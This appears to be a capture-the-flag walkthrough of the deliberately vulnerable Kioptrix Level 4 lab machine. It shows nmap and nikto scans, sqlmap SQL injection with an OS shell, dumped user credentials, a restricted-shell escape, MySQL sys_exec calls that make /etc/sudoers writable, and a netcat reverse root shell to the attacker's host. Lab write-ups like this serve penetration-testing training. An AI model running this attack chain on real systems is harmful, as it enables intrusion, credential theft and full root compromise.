Kioptrix Level 4
Infomation Gathing
Nmap
root@kali:~# nmap -v -A -p1-65535 192.168.1.10
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-07 19:16 PST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:16
Completed NSE at 19:16, 0.00s elapsed
Initiating NSE at 19:16
Completed NSE at 19:16, 0.00s elapsed
Initiating NSE at 19:16
Completed NSE at 19:16, 0.00s elapsed
Initiating ARP Ping Scan at 19:16
Scanning 192.168.1.10 [1 port]
Completed ARP Ping Scan at 19:16, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:16
Completed Parallel DNS resolution of 1 host. at 19:16, 13.00s elapsed
Initiating SYN Stealth Scan at 19:16
Scanning 192.168.1.10 [65535 ports]
Discovered open port 22/tcp on 192.168.1.10
Discovered open port 139/tcp on 192.168.1.10
Discovered open port 80/tcp on 192.168.1.10
Discovered open port 445/tcp on 192.168.1.10
Completed SYN Stealth Scan at 19:16, 24.75s elapsed (65535 total ports)
Initiating Service scan at 19:16
Scanning 4 services on 192.168.1.10
Completed Service scan at 19:16, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.10
NSE: Script scanning 192.168.1.10.
Initiating NSE at 19:16
Completed NSE at 19:17, 30.09s elapsed
Initiating NSE at 19:17
Completed NSE at 19:17, 0.02s elapsed
Initiating NSE at 19:17
Completed NSE at 19:17, 0.01s elapsed
Nmap scan report for 192.168.1.10
Host is up (0.00030s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:1D:08:07 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 497.101 days (since Sat Jul 28 17:51:25 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h30m04s, deviation: 3h32m08s, median: 3s
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: , NetBIOS MAC: (unknown)
| Names:
| KIOPTRIX4<00> Flags:
| KIOPTRIX4<03> Flags:
| KIOPTRIX4<20> Flags:
| WORKGROUP<1e> Flags:
|_ WORKGROUP<00> Flags:
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2019-12-07T22:17:04-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.30 ms 192.168.1.10
NSE: Script Post-scanning.
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.19 seconds
Raw packets sent: 91558 (4.029MB) | Rcvd: 39548 (1.583MB)
Nikto
root@kali:~# nikto -h http://192.168.1.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.10
+ Target Hostname: 192.168.1.10
+ Target Port: 80
+ Start Time: 2019-12-07 19:18:29 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 03:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8724 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2019-12-07 19:19:13 (GMT-8) (44 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Using Sqlmap Inject
http://192.168.1.10/checklogin.php (POST) # /usr/bin/sqlmap -u http://192.168.1.10/checklogin.php --data=myusername=234&mypassword=24&Submit=Login --os-shell
Got John SSH account by members table
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password |
+----+----------+-----------------------+
| 1 | john | MyNameIsJohn |
| 2 | robert | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
Database: Mysql
Table: user
[6 entries]
+-----------+------------------+-------------------------------------------+
| host | user | password |
+-----------+------------------+-------------------------------------------+
| localhost | root | |
| Kioptrix4 | root | |
| 127.0.0.1 | root | |
| localhost | | |
| Kioptrix4 | | |
| localhost | debian-sys-maint | *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879 |
+-----------+------------------+-------------------------------------------+
Use Bash
root@kali:~/.sqlmap/output# ssh john@192.168.1.10
john@192.168.1.10's password:
Permission denied, please try again.
john@192.168.1.10's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ help
cd clear echo exit help ll lpath ls
john:~$ echo os.system("/bin/sh")
$ whoami
john
$
john@Kioptrix4:/$ mysql -u root -p
mysql> select sys_exec("chown -hR john:john /etc/sudoers");
mysql> select sys_exec("chmod +wrx /etc/sudoers");
john@Kioptrix4:/etc$ vim sudoers
1 # /etc/sudoers
2 #
3 # This file MUST be edited with the 'visudo' command as root.
4 #
5 # See the man page for details on how to write a sudoers file.
6 #
7
8 Defaults env_reset
9
10 # Host alias specification
11
12 # User alias specification
13
14 # Cmnd alias specification
15
16 # User privilege specification
17 root ALL=(ALL) ALL
18 john ALL=(ALL) ALL
Using netcat reverse root Shell
john@Kioptrix4:/$ whereis netcat
netcat: /bin/netcat /usr/share/man/man1/netcat.1.gz
john@Kioptrix4:/$ sudo netcat 192.168.1.7 999 -e /bin/bash
Got Shell
root@kali:/usr/share/exploitdb/exploits/linux/remote# nc -nvlp 999
listening on [any] 999 ...
connect to [192.168.1.7] from (UNKNOWN) [192.168.1.10] 46235
whoami
root
评论
发表评论